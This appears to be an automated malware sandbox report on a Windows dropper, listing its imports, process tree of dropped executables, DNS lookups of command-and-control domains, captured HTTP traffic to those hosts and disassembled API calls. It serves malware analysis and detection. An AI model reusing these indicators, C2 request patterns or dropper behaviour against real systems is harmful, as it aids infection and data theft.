KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932	TCP	2031515	ET TROJAN Known Sinkhole Response Kryptos Logic	80	49166	147.75.61.38	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2023 06:01:37.211152077 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.333363056 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.333457947 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.333792925 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.455874920 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.455931902 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.455969095 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.455986977 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.456039906 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.456289053 CEST	49166	80	192.168.2.22	147.75.61.38
Oct 1, 2023 06:01:37.578176022 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.578208923 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:37.578372002 CEST	80	49166	147.75.61.38	192.168.2.22
Oct 1, 2023 06:01:40.038088083 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.212160110 CEST	80	49167	34.29.71.138	192.168.2.22
Oct 1, 2023 06:01:40.212265968 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.212869883 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.386900902 CEST	80	49167	34.29.71.138	192.168.2.22
Oct 1, 2023 06:01:40.386976957 CEST	80	49167	34.29.71.138	192.168.2.22
Oct 1, 2023 06:01:40.387012005 CEST	80	49167	34.29.71.138	192.168.2.22
Oct 1, 2023 06:01:40.387048006 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.387104034 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.404280901 CEST	49167	80	192.168.2.22	34.29.71.138
Oct 1, 2023 06:01:40.619858027 CEST	80	49167	34.29.71.138	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2023 06:01:20.029628992 CEST	138	138	192.168.2.22	192.168.2.255
Oct 1, 2023 06:01:37.098201990 CEST	57894	53	192.168.2.22	8.8.4.4
Oct 1, 2023 06:01:37.210273027 CEST	53	57894	8.8.4.4	192.168.2.22
Oct 1, 2023 06:01:37.456758976 CEST	57895	53	192.168.2.22	8.8.4.4
Oct 1, 2023 06:01:37.855343103 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 1, 2023 06:01:38.076950073 CEST	53	57895	8.8.4.4	192.168.2.22
Oct 1, 2023 06:01:38.080461025 CEST	54719	53	192.168.2.22	8.8.8.8
Oct 1, 2023 06:01:38.604868889 CEST	53	54719	8.8.8.8	192.168.2.22
Oct 1, 2023 06:01:38.610348940 CEST	49881	53	192.168.2.22	8.8.8.8
Oct 1, 2023 06:01:38.857579947 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 1, 2023 06:01:39.133213043 CEST	53	49881	8.8.8.8	192.168.2.22
Oct 1, 2023 06:01:39.134609938 CEST	137	137	192.168.2.22	192.168.2.255
Oct 1, 2023 06:01:39.871609926 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 1, 2023 06:01:39.887109041 CEST	137	137	192.168.2.22	192.168.2.255
Oct 1, 2023 06:01:40.016741037 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 1, 2023 06:01:40.026393890 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 1, 2023 06:01:40.651536942 CEST	137	137	192.168.2.22	192.168.2.255
Oct 1, 2023 06:01:43.965873003 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 1, 2023 06:03:19.729870081 CEST	138	138	192.168.2.22	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 1, 2023 06:01:40.026474953 CEST	192.168.2.22	8.8.8.8	d024	(Port unreachable)	Destination Unreachable
Oct 1, 2023 06:01:43.965990067 CEST	192.168.2.22	8.8.8.8	d014	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2023 06:01:37.098201990 CEST	192.168.2.22	8.8.4.4	0x1234	Standard query (0)	xdqzpbcgrvkj.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:37.456758976 CEST	192.168.2.22	8.8.4.4	0x1234	Standard query (0)	anam0rph.su	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:37.855343103 CEST	192.168.2.22	8.8.8.8	0xb02d	Standard query (0)	pe.suckmycocklameavindustry.in	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:38.080461025 CEST	192.168.2.22	8.8.8.8	0x82e1	Standard query (0)	anam0rph.su	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:38.610348940 CEST	192.168.2.22	8.8.8.8	0x2610	Standard query (0)	anam0rph.su	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:38.857579947 CEST	192.168.2.22	8.8.8.8	0xb02d	Standard query (0)	pe.suckmycocklameavindustry.in	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:39.871609926 CEST	192.168.2.22	8.8.8.8	0xb02d	Standard query (0)	pe.suckmycocklameavindustry.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2023 06:01:37.210273027 CEST	8.8.4.4	192.168.2.22	0x1234	No error (0)	xdqzpbcgrvkj.ru		147.75.61.38	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:37.210273027 CEST	8.8.4.4	192.168.2.22	0x1234	No error (0)	xdqzpbcgrvkj.ru		147.75.63.87	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:38.076950073 CEST	8.8.4.4	192.168.2.22	0x1234	Server failure (2)	anam0rph.su	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:38.604868889 CEST	8.8.8.8	192.168.2.22	0x82e1	Server failure (2)	anam0rph.su	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:39.133213043 CEST	8.8.8.8	192.168.2.22	0x2610	Server failure (2)	anam0rph.su	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:40.016741037 CEST	8.8.8.8	192.168.2.22	0xb02d	No error (0)	pe.suckmycocklameavindustry.in		34.29.71.138	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:40.026393890 CEST	8.8.8.8	192.168.2.22	0xb02d	No error (0)	pe.suckmycocklameavindustry.in		34.29.71.138	A (IP address)	IN (0x0001)	false
Oct 1, 2023 06:01:43.965873003 CEST	8.8.8.8	192.168.2.22	0xb02d	Server failure (2)	pe.suckmycocklameavindustry.in	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

xdqzpbcgrvkj.ru

pe.suckmycocklameavindustry.in

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	147.75.61.38	80	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Oct 1, 2023 06:01:37.333792925 CEST	2	OUT	POST /in.php HTTP/1.1 Host: xdqzpbcgrvkj.ru User-Agent: Mozilla/4.0 Content-Type: application/x-www-form-urlencoded Content-Length: 84 Connection: close
Oct 1, 2023 06:01:37.455931902 CEST	3	IN	HTTP/1.1 200 OK Date: Sun, 01 Oct 2023 04:01:37 GMT Content-Length: 607 Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Oct 1, 2023 06:01:37.455986977 CEST	3	OUT	Data Raw: 75 70 71 63 68 69 34 2b 75 46 54 41 45 2b 4e 6a 6d 49 4b 47 49 77 69 4c 72 48 6f 33 56 74 36 38 54 33 79 71 76 68 51 75 32 54 71 65 74 51 37 38 72 6f 79 37 51 36 62 6f 54 66 44 55 74 59 49 66 74 5a 33 33 4d 78 34 47 4b 67 77 67 39 6d 59 33 71 77 Data Ascii: upqchi4+uFTAE+NjmIKGIwiLrHo3Vt68T3yqvhQu2TqetQ78roy7Q6boTfDUtYIftZ33Mx4GKgwg9mY3qw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49167	34.29.71.138	80	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Oct 1, 2023 06:01:40.212869883 CEST	5	OUT	GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: pe.suckmycocklameavindustry.in Connection: Keep-Alive
Oct 1, 2023 06:01:40.386976957 CEST	6	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 01 Oct 2023 04:01:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.pe.suckmycocklameavindustry.in; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=pe.suckmycocklameavindustry.in; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=8894309f7f6b8698b45deaaa26bda18e\|89.187.171.144\|1696132900\|1696132900\|0\|1\|0; path=/; domain=.suckmycocklameavindustry.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=89.187.171.144; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Target ID:	0
Start time:	06:01:19
Start date:	01/10/2023
Path:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Imagebase:	0x400000
File size:	196'227 bytes
MD5 hash:	BC76BD7B332AA8F6AEDBB8E11B7BA9B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:01:19
Start date:	01/10/2023
Path:	C:\Users\user\AppData\Local\Temp\Sahofivizu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	7FE00CC4EA8429629AC0AC610DB51993
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 57%, ReversingLabs Detection: 61%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:01:24
Start date:	01/10/2023
Path:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Imagebase:	0x400000
File size:	196'227 bytes
MD5 hash:	BC76BD7B332AA8F6AEDBB8E11B7BA9B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:01:24
Start date:	01/10/2023
Path:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
Imagebase:	0x400000
File size:	196'227 bytes
MD5 hash:	BC76BD7B332AA8F6AEDBB8E11B7BA9B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:01:25
Start date:	01/10/2023
Path:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Imagebase:	0x400000
File size:	88'209 bytes
MD5 hash:	B3657BCFE8240BC0985093A0F8682703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs Detection: 85%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:01:26
Start date:	01/10/2023
Path:	C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Imagebase:	0x400000
File size:	19'968 bytes
MD5 hash:	44902781C1865978B17F396DB51D85E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 76%, ReversingLabs Detection: 77%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:01:31
Start date:	01/10/2023
Path:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Imagebase:	0x400000
File size:	88'209 bytes
MD5 hash:	B3657BCFE8240BC0985093A0F8682703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:01:31
Start date:	01/10/2023
Path:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Imagebase:	0x400000
File size:	88'209 bytes
MD5 hash:	B3657BCFE8240BC0985093A0F8682703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:01:31
Start date:	01/10/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\svchost.exe
Imagebase:	0xcd0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.8%
Total number of Nodes:	1217
Total number of Limit Nodes:	24

Executed Functions

Function 004030FA Relevance: 68.5, APIs: 24, Strings: 15, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403119
SetErrorMode.KERNELBASE(00008001), ref: 00403124
OleInitialize.OLE32(00000000), ref: 0040312B

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

SHGetFileInfoA.SHELL32(00428F98,00000000,?,00000160,00000000,00000008), ref: 00403153

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

GetCommandLineA.KERNEL32(0042E360,NSIS Error), ref: 00403168
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 0040317B
CharNextA.USER32(00000000), ref: 004031A6
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403239
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040324E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040325A
DeleteFileA.KERNELBASE(1033), ref: 0040326D
ExitProcess.KERNELBASE(00000000), ref: 004032E6
OleUninitialize.OLE32 ref: 004032EB
ExitProcess.KERNEL32 ref: 0040330B
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00403317
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00403323
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040332F
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403336
DeleteFileA.KERNEL32(00428B98,00428B98,?,0042F000,?), ref: 00403380
CopyFileA.KERNEL32 ref: 00403394
CloseHandle.KERNEL32(00000000), ref: 004033C1
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403416
ExitWindowsEx.USER32(00000002,00000000), ref: 00403452
ExitProcess.KERNEL32 ref: 00403475

Strings

_?=, xrefs: 00403294
C:\Users\user\Desktop\Hu25VEa8Dr.exe, xrefs: 0040338F
Error launching installer, xrefs: 004032A3
", xrefs: 004031C8
/D=, xrefs: 004031FC
NSIS Error, xrefs: 00403159
NCRC, xrefs: 004031E6
SeShutdownPrivilege, xrefs: 00403428
\Temp, xrefs: 00403254
1033, xrefs: 00403268
C:\Users\user\AppData\Local\Temp\, xrefs: 0040322E, 00403233, 0040324D, 00403259, 00403316, 00403322, 0040332E, 00403335, 004033D5
~nsu.tmp, xrefs: 00403311
C:\Users\user\AppData\Local\Temp, xrefs: 004032C8
C:\Users\user\Desktop, xrefs: 0040331C, 00403321, 00403344
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 0040316E, 00403174, 0040328A

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Hu25VEa8Dr.exe"$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hu25VEa8Dr.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 553446912-711809269
Opcode ID: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
Instruction ID: 1e9e478c3a9e7f3573a82b9cae4fcf3dc9ecc54075f91e84b1854e8c20532e3f
Opcode Fuzzy Hash: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
Instruction Fuzzy Hash: 4191D130A08344AFE7216F61AD4AB6B7E9CEB0530AF04057FF541B61D2C77C99058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405331 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 0040534F
lstrcatA.KERNEL32(0042AFE8,\*.*,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 00405399
lstrcatA.KERNEL32(?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053BA
lstrlenA.KERNEL32(?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053C0
FindFirstFileA.KERNELBASE(0042AFE8,?,?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 004053D1
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405483
FindClose.KERNEL32(?), ref: 00405494

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405331
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 0040533B
\*.*, xrefs: 00405393

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2724472312
Opcode ID: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
